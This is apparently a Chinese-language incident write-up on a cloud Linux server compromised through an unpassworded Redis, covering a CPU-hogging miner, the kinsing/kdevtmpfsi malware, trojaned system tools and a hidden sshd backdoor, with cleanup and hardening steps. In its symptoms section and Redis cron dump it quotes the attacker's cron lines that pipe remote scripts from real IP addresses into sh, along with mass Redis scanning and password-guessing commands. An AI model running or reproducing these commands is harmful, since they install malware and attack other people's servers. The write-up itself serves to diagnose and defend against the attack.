1.中毒特征

有跑满100%CPU的进程notlsb notlsa

[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux|grep notlsb
root      9710  0.0  0.0 112712   968 pts/1    S+   12:20   0:00 grep --color=auto notlsb
root     13009 48.1  0.2  39804  5420 ?        Ssl  Nov26 1149:03 ./notlsb

杀死后，发现一个pnscan进程，杀不死

[root@ecs-s6-large-2-linux-20191113142903 ~]# ps aux|grep pnscan
root      7471  3.7  0.0 9481936  928 ?        Sl   11:50   0:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 66 6f 0d 0a 198.234.0.0/16 6379

[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux |grep masscan
root      6762  2.5  2.0 201960 38744 ?        Sl   12:24   0:00 masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16

crontab -e

//"/tmp/crontab.F4Macp"
*/15 * * * * curl -fsSL 122.51.164.83:7770/ash.sh|sh

有大量redis-cli进程：

[root@ecs-s6-large-2-linux-20191113142903 redis-4.0.14]# ps -ef |grep redis-cli
root      5751 28428  0 12:13 pts/1    00:00:00 grep --color=auto redis-cli
root     22237     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 --raw
root     22253     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 -a 123456 --raw
root     22303     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a oracle --raw
root     22305     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a password --raw
root     22309     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123 --raw
root     22311     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123! --raw
root     22315     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a admin --raw
root     22397     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 --raw
root     22401     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 -a root --raw
root     22481     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a root --raw
root     22487     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a p@aaw0rd --raw
root     22491     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a abc123! --raw
root     22493     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a 123456 --raw
root     22597     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 --raw
root     22599     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a redis --raw
root     22601     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a root --raw
root     22603     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a oracle --raw
root     22605     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a password --raw
root     22607     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a p@aaw0rd --raw
root     22609     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123 --raw
root     22611     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123! --raw
root     22614     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a 123456 --raw
root     22616     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a admin --raw
root     22618     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 --raw
root     22620     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a redis --raw
root     22622     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a root --raw
root     22624     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a oracle --raw

/bin目录下的异常文件

这几个系统命令被篡改：

计划任务在下载木马：

/tmp下的木马文件

2.原因

通过redis 目前中毒的共同点就是安装了 redis 并且没有设置密码。 有人 利用redis的漏洞。固定在去请求阿里云的内网网ip。找有3306 端口，并且没有设置密码的 ecs。然后植入病毒。

3.解决方法

• 1）删除了 root 用户下面你的所有定时任务。

crontab -u root -r 

rm -rf /usr/bin/dpkgd (ps netstat lsof ss)
rm -rf /usr/bin/bsd-port     #木马程序
rm -f /usr/bin/.sshd         #木马后门
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux

• 2）不要用 默认端口还不设置密码
  在redis.conf 中 requirepass XXX

• 3）批量杀死redis-cli进程

ps -ef |grep redis-cli|awk '{print $2}'|xargs kill -9

第一步 top 找到kdevtmpfsi的进程号

第二步 systemctl status 进程号

可以看到 kdevtmpfsi的父进程kinsing，和进程的启动位置路径

ok，把这两个依次kill掉，并且删除它们的源文件

rm -af /var/tmp/kinsing

rm -af /tmp/kdevtmpfsi

用命令 crontab -l 查看定时任务

cd到 /var/spool/cron/ 目录下，查看redis用户

cat redis：

REDIS0009   redis-ver5.0.2
redis-bits￀㨭eLĪused-mem¨H
preamble~Q

*/1 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh

cd /var/spool/cron 查看是否有相关的木马定时任务在执行（root文件里面为定时任务）有的话删掉再重启下crontab（命令：systemctl restart crond.service）

后续操作：（找到文件，全部删除，若没有则无需操作
find / -name kdevtmpfsi

find / -name kinsing

4.后续

[root@ecs-s6-large-2-linux-20191113142903 .ssh]# ps -ef|grep sshd
root      2869     1  0 Nov13 ?        00:00:06 /usr/sbin/sshd -D
root      6380     1  0 Nov29 ?        00:00:00 /usr/bin/.sshd
root     10107  2869  0 15:19 ?        00:00:00 sshd: root@pts/6
root     20048     1  0 Dec09 ?        00:00:00 /usr/bin/.sshd
root     22857  2869  0 11:41 ?        00:00:00 sshd: root@pts/3
root     22881  2869  0 11:41 ?        00:00:00 sshd: root@pts/4
root     22996  2869  0 14:18 ?        00:00:00 sshd: root@pts/0
root     23018  2869  0 14:19 ?        00:00:00 sshd: root@pts/1
root     23078  2869  0 14:48 ?        00:00:00 sshd: root@pts/2
root     23080  2869  0 14:48 ?        00:00:00 sshd: root@notty
root     23115  2869  0 14:49 ?        00:00:00 sshd: root@pts/5
root     23117  2869  0 14:49 ?        00:00:00 sshd: root@notty

/tmp下的文件无法删除：
i ：设定文件不能被删除、改名、设定链接关系，同时不能写入或新增内容；对目录

[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
----i--------e-- config.json
-------------e-- conf.n
-------------e-- notlsb
----i--------e-- sysupdate
----i--------e-- tmp.WhhpNAqNIg/notlsb
----i--------e-- tmp.XZYubjPJK3/notlsa
----i--------e-- wgeta
----i--------e-- wgetb

[root@ecs-s6-medium-2-linux-20191116090109 tmp]# chattr -R -i *
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
-------------e-- conf.n
-------------e-- tmp.WhhpNAqNIg/notlsb
-------------e-- tmp.XZYubjPJK3/notlsa

ls /usr/bin/dpkgd/ #替换的工具，系统自带的工具正常不会在这个目录下，并且也不可用

netstat lsof ps ss

/usr/bin/bsd-port #后门程序

/usr/sbin/.sshd #判断是后门程序

5.华为安全人员的给出的建议

安全排查：
初步判断主机疑似因redis未授权访问漏洞被入侵（漏洞详情可参考链接：http://www.freebuf.com/vuls/85021.html），当前主机内异常文件已暂协助客户清除，为防止黑客留有其他后门，建议客户择机重装系统，重新部署应用，并对参考安全加固建议对主机进行安全加固。

安全加固建议：
1、部署redis建议修改默认端口或者限制IP访问，开启密码认证功能，并使用强密码。
2、启动安全组白名单策略，根据业务需求对外开放端口，关闭不必要开放的端口！对于特殊业务端口，建议设置固定的来源IP（如： 6379、22）或使用VPN、堡垒机建立自己的运维通道；
3、严格控制各服务的系统权限，各服务进程请不要以root权限运行；各应用(如WEB)同数据库交互的账号同样不要使用root权限的账号；
4、设置系统所有账号口令（包括系统账户和应用账户）为符合规范的强口令；
强口令设置要求参照：https://bbs.huaweicloud.com/blogs/87a98385ec6411e79fc57ca23e93a89f
5、建议定期做好数据备份（虚拟机内部备份，异地备份，云上云下备份等），避免被加密勒索；
6、为防御主机和应用方面潜在的安全风险，保护主机不遭受进一步破坏，建议使用华为云官方提供的企业主机安全或安全专家服务：
企业主机安全服务参照：https://www.huaweicloud.com/product/hss.html
安全专家服务参照：https://www.huaweicloud.com/product/ses.html